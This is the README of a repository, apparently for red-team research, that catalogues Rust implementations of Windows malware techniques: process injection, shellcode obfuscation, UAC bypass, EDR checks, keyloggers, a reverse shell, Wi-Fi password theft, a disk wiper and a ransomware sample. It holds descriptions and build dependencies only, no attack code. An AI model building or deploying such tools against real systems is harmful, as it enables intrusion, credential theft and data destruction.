This repository contains source codes of various techniques used by real-world malware authors, red teamers, threat actors, state-sponsored hacking groups etc. These techniques are well-researched and implemented in Rust.
Repository managed by @5mukx
Note: These are my own research and implementations, derived from the original authors' work. If you discover any errors in these codes, please contact or contribute to this repository.
| Techniques | Description |
|---|---|
| Process Injection | Process Injection Techniques using Rust. |
| Process Injection 2 | Process Injection Techniques Snippet 2. |
| Process Ghosting | Process Ghosting Technique Written in Rust. |
| Process Hypnosis | Process Hypnosis Technique Written in Rust. |
| Process Herpaderping | Process Herpaderping Written in Rust. |
| NtCreateUserProcess | Launching the Process using NtCreateUserProcess API. |
| Named Pipes | Demonstrating IPC using named pipes on Windows |
| BlockHandle | Block Handles using SDDL PoC. |
| Dynamic Export Table PEB | Calls Windows Function by searching memory. |
| API Hammering | API Hammering techniques. |
| Early Cascade Injection | Early-Cascade Injection POC written in Rust. |
| Encryption Methods | Methods to Encrypt and Execute Payloads. |
| Enumeration | Enumeration Modules to save your time. |
| Malware Samples | Written malwares based on Real world activities. |
| Metadata Modification | Extract and Embed custom metadata to our Binary File. |
| Keyloggers | Custom Implementation of Keyloggers written in Rust. |
| DLL Injection | DLL injection in Rust. |
| Code Snippet | Helps to perform certain malware operations. |
| NTAPI Implementation | Code snippet of using ntapi. |
| Extract Wifi Passwords | Extract Windows Stored Wifi Passwords. |
| Reverse Shell Rust | Rust Client Server Reverse Shell. |
| Thread Hijacking | Thread Hijacking code Snippet. |
| Self Delete | Techniques to Self Delete an running binary file. |
| Position Independent Series | Position independent series in Rust. |
| Shellcode Execution methods | Shellcode execution methods using WinApi's. |
| Sleep Obfuscation | Sleep Obfuscation implementation in Rust. |
| Syscalls | Syscall Implementation using system call STUB [Direct/Indirect] methods. |
| BSOD | Causes BSOD when Executing. |
| Persistence | Persistence Code Snippet. |
| UAC Bypass CMSTP | Bypass UAC by elevating CMSTP.exe |
| Malware DSA | Implementing malwares using DSA (Data Structures and Algorithms) Concept. |
| Shellcode Obfuscation | Obfuscate and deobfuscate shellcode using Ipv4, Ipv6, MAC, UUiD formats. |
| EDR Checker | Check for the presence of EDR's tools, AV softwares, and other security-related applications on a Windows system. |
| Keylogger Dropper | Downloads keylogger and sender on victim PC and executes in background. |
| Rand_Fill | A Small Parallel Program that Deletes All Files on Disk and Fills with Random Bytes, Making the Recovery Process Impossible. |
| Encryfer-X | Ransomware written by combining all Possible POC techniques. |
| Techniques | Description |
|---|---|
| AES Encryption | Encrypt and Decrypt Shellcodes/Payloads using AES-Encryption |
| RC4 Encryption | Encrypt and Decrypt Shellcodes/Payloads using RC4-Encryption |
| Khufu Encryption | Perform Encrypt and Decrypt using Khufu Algorithm |
| Camellia Cipher | Perform Encryption using Camellia Cipher |
| NullxFigure | Simple Program to parse null bytes into each shellcode |
| A5/1 Cipher | Encrypt shellcode using a modified A5/1 cipher with seeded randomness. |
| XOR Encryption | Shellcode Encryption using XOR |
| Lucifer Algorithm | Encrypt and Decrypt shellcodes using Lucifer Algorithm. |
| DFC Algorithm | Encrypt and execute payloads using DFC Algorithm. |
| Payload Suffling | Payload Suffling Techniques |
| ECC Encryption | Encrypt and Decrypt Shellcodes/Payloads using ECC (Elliptic Curve Cryptography) |
| SystemFunction032/033 | Encrypt and Decrypt shellcode using undocumented winapi function. |
Click Here to download the Repository: Download
Manifest dependencies for winapi to test and execute
Copy the dependencics in Cargo.toml file
[dependencies]
winapi = { version = "0.3.9", features = ["winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
ntapi = "0.4.1"
Tips for Rust Beginners: Copy and save the dependencies in Cargo.toml File. Versions may be different. Just copy the features when testing.
- New to Rust ? : Please Follow the steps here Compile
- How to Compile this Repository Source Codes README
- How to clean all the PoC recursively Commands
- Cross Compilation Using Docker READMe.
If you need an exploit or proof-of-concept (PoC) removed, please contact me via email at [[email protected] (mailto:[email protected])] or through my Twitter handle @5mukx